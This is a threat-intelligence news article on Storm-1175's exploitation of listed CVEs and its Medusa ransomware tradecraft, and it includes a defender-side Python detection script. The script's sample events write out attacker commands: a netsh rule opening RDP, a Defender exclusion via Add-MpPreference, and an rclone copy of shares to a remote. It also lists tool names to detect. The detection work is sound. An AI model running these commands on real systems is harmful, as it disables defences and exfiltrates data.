China-Linked Storm-1175 Exploits Zero-Days to Rapidly Deploy Medusa Ransomware
Storm-1175: China-Linked Group Exploits Zero-Day Vulnerabilities to Launch Medusa Ransomware Attacks at Remarkable Speed
Storm-1175: China-Linked Actor Exploits Zero-Days for High-Velocity Medusa Ransomware Attacks
TL;DR
The China-based threat actor Storm-1175 is leveraging a combination of zero-day and N-day vulnerabilities to conduct rapid-fire ransomware attacks. By chaining exploits and using legitimate RMM tools, the group has successfully deployed Medusa ransomware in as little as 24 hours, heavily impacting healthcare, finance, and education sectors across the US, UK, and Australia.
A sophisticated, China-linked threat actor identified as Storm-1175 is setting a new standard for operational speed in the cybercriminal world. According to a recent report from the Microsoft Threat Intelligence team, this group is weaponizing both zero-day and recently disclosed vulnerabilities to orchestrate "high-velocity" intrusions that often end in the deployment of Medusa ransomware.
The actor’s proficiency in identifying exposed perimeter assets has allowed them to maintain a high operational tempo, frequently catching organizations off guard during the critical window between vulnerability disclosure and patch application.
High-Velocity Attacks and Global Impact
Storm-1175 does not linger once it gains initial access. The group is known for its ability to exfiltrate data and deploy ransomware within just a few days—and in some cases, in less than 24 hours.
The group’s campaign has primarily targeted critical infrastructure and key economic sectors, including:
- Healthcare
- Education
- Finance
- Professional Services
Geographically, the impact has been felt most acutely in the United States, the United Kingdom, and Australia.
The Weaponization of Zero-Days and N-Days
Since 2023, Storm-1175 has been linked to the exploitation of over 16 different vulnerabilities. Most notably, the actor has utilized zero-day exploits—vulnerabilities unknown to the vendor—before they were publicly disclosed. Two specific examples cited include CVE-2025-10035 (Fortra GoAnywhere MFT) and CVE-2026-23760 (SmarterTools SmarterMail).
The group’s extensive exploit portfolio includes:
- Microsoft Exchange Server: CVE-2023-21529
- PaperCut: CVE-2023-27351 and CVE-2023-27350
- Ivanti Connect Secure: CVE-2023-46805 and CVE-2024-21887
- ConnectWise ScreenConnect: CVE-2024-1708 and CVE-2024-1709
- JetBrains TeamCity: CVE-2024-27198 and CVE-2024-27199
- CrushFTP: CVE-2025-31161
- BeyondTrust: CVE-2026-1731
In late 2024, the group also began targeting Linux systems, specifically Oracle WebLogic instances. While the exact vulnerability used in the WebLogic attacks remains unknown, the shift signals a broadening of their technical capabilities.
Tactics, Techniques, and Procedures (TTPs)
Storm-1175 employs a "living-off-the-land" strategy to evade detection and maintain persistence. Their methodology involves:
- Persistence & Movement: Creating new user accounts, deploying web shells, and using legitimate Remote Monitoring and Management (RMM) software (e.g., AnyDesk, Atera, or MeshAgent) to move laterally through the network.
- Tooling: Using PowerShell, PsExec, and Impacket for lateral movement, alongside PDQ Deployer for ransomware delivery.
- Security Evasion: Modifying Windows Firewall policies to enable RDP and configuring Microsoft Defender Antivirus exclusions to prevent the blocking of ransomware payloads.
- Credential Theft: Leveraging Mimikatz and Impacket for credential dumping.
- Data Exfiltration: Using Bandizip for collection and Rclone for exfiltration prior to encryption.
The Rise of Dual-Use Infrastructure
One of the most concerning trends highlighted in the report is the actor's reliance on legitimate RMM tools like SimpleHelp and ConnectWise. By using these tools, Storm-1175 can blend its malicious traffic with trusted, encrypted platform communications, making it significantly harder for security teams to distinguish between administrative activity and a cyberattack.
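A defender-side detection sketch for the tradecraft listed under TTPs and the RMM abuse described above, added here as an example; it is not code from the Microsoft report or The Hacker News article. It assumes endpoint telemetry shaped after Sysmon Event ID 1 (process creation) and Microsoft Defender Antivirus Event ID 5007 (configuration change) records, an organization-specific RMM allowlist (APPROVED_RMM is hypothetical), and the usual executable names for the tools the article names (those basenames are assumptions, not values from the report). The sample events are constructed, not captured from a real incident.

```python
# Added example, not from the report: flag unapproved RMM agents, RDP firewall
# changes, Defender exclusions and exfil tooling in Sysmon/Defender-shaped events.
from collections import defaultdict

APPROVED_RMM = {"meshagent.exe"}  # hypothetical: the only RMM agent this org sanctions

# RMM tools named in the article; executable basenames are assumptions.
RMM_BINARIES = {
    "anydesk.exe": "AnyDesk",
    "ateraagent.exe": "Atera",
    "meshagent.exe": "MeshAgent",
    "screenconnect.clientservice.exe": "ConnectWise ScreenConnect",
}
# Collection/exfiltration tools named in the article; basenames are assumptions.
EXFIL_BINARIES = {"rclone.exe": "Rclone", "bandizip.exe": "Bandizip"}

SYSMON = "Microsoft-Windows-Sysmon/Operational"
DEFENDER = "Microsoft-Windows-Windows Defender/Operational"


def basename(image):
    """Lower-cased file name of a Windows image path."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_rdp_firewall_change(cmd):
    """netsh or PowerShell command that opens RDP (TCP/3389) in Windows Firewall."""
    c = cmd.lower()
    if "netsh" in c and "advfirewall" in c and "action=allow" in c:
        return "localport=3389" in c or "remote desktop" in c
    if "remote desktop" in c:
        return "enable-netfirewallrule" in c or (
            "set-netfirewallrule" in c and "-enabled true" in c)
    return False


def is_defender_exclusion_cmd(cmd):
    """Add-MpPreference / Set-MpPreference adding an antivirus exclusion."""
    c = cmd.lower()
    return ("add-mppreference" in c or "set-mppreference" in c) and "-exclusion" in c


def alert(host, category, detail):
    return {"host": host, "category": category, "detail": detail}


def check_process(ev):
    """Alerts derived from one process-creation event."""
    name, cmd, host = basename(ev["Image"]), ev.get("CommandLine", ""), ev["Host"]
    alerts = []
    if name in RMM_BINARIES and name not in APPROVED_RMM:
        alerts.append(alert(host, "unauthorized_rmm", RMM_BINARIES[name]))
    if name in EXFIL_BINARIES:
        alerts.append(alert(host, "exfil_tooling", EXFIL_BINARIES[name]))
    if is_rdp_firewall_change(cmd):
        alerts.append(alert(host, "rdp_firewall_opened", cmd))
    if is_defender_exclusion_cmd(cmd):
        alerts.append(alert(host, "defender_exclusion", cmd))
    return alerts


def check_defender_config(ev):
    """Event 5007 whose new value lands under the Defender Exclusions registry key."""
    if ev["EventID"] == 5007 and "\\windows defender\\exclusions\\" in ev["Message"].lower():
        return [alert(ev["Host"], "defender_exclusion", ev["Message"])]
    return []


def analyze(events):
    """Run every event through the matching check and collect the alerts."""
    alerts = []
    for ev in events:
        if ev["Channel"] == SYSMON and ev["EventID"] == 1:
            alerts.extend(check_process(ev))
        elif ev["Channel"] == DEFENDER:
            alerts.extend(check_defender_config(ev))
    return alerts


def escalate(alerts, min_categories=3):
    """Hosts where several distinct stages of the tradecraft appear together."""
    per_host = defaultdict(set)
    for a in alerts:
        per_host[a["host"]].add(a["category"])
    return {h: sorted(c) for h, c in per_host.items() if len(c) >= min_categories}


# Constructed sample telemetry (two hosts, one benign process), not real incident data.
SAMPLE_EVENTS = [
    {"Channel": SYSMON, "EventID": 1, "Host": "WS01", "Image": r"C:\Users\Public\AnyDesk.exe",
     "CommandLine": "AnyDesk.exe --silent"},
    {"Channel": SYSMON, "EventID": 1, "Host": "WS01", "Image": r"C:\Program Files\Mesh Agent\MeshAgent.exe",
     "CommandLine": "MeshAgent.exe"},
    {"Channel": SYSMON, "EventID": 1, "Host": "WS01", "Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": 'netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow'},
    {"Channel": SYSMON, "EventID": 1, "Host": "WS01", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -c Add-MpPreference -ExclusionPath C:\Users\Public"},
    {"Channel": DEFENDER, "EventID": 5007, "Host": "WS01",
     "Message": r"Microsoft Defender Antivirus Configuration has changed. New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Public = 0x0"},
    {"Channel": SYSMON, "EventID": 1, "Host": "FS02", "Image": r"C:\Tools\rclone.exe",
     "CommandLine": r"rclone.exe copy D:\Shares remote:bucket"},
    {"Channel": SYSMON, "EventID": 1, "Host": "FS02", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    found = analyze(SAMPLE_EVENTS)
    for a in found:
        print(a["host"], a["category"], a["detail"][:70])
    print("escalated hosts:", escalate(found))
```

The approved MeshAgent on WS01 produces nothing, which is the point of an allowlist rather than a blanket RMM signature: the same binaries are legitimate in many environments, so the detection has to encode what this organization actually sanctions. escalate() groups alerts by host so that a single machine showing an unapproved RMM agent, an RDP firewall change and a Defender exclusion together is raised above the individual, noisier signals.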
Conclusion
Storm-1175 represents a growing trend of financially motivated actors who possess the technical sophistication usually reserved for state-sponsored espionage. By rotating exploits quickly and capitalizing on the "patch gap," they ensure a high success rate for their Medusa ransomware deployments. Organizations must prioritize the rapid patching of internet-facing assets and monitor for the unauthorized use of RMM tools within their environments to mitigate this evolving threat.
Source: The Hacker News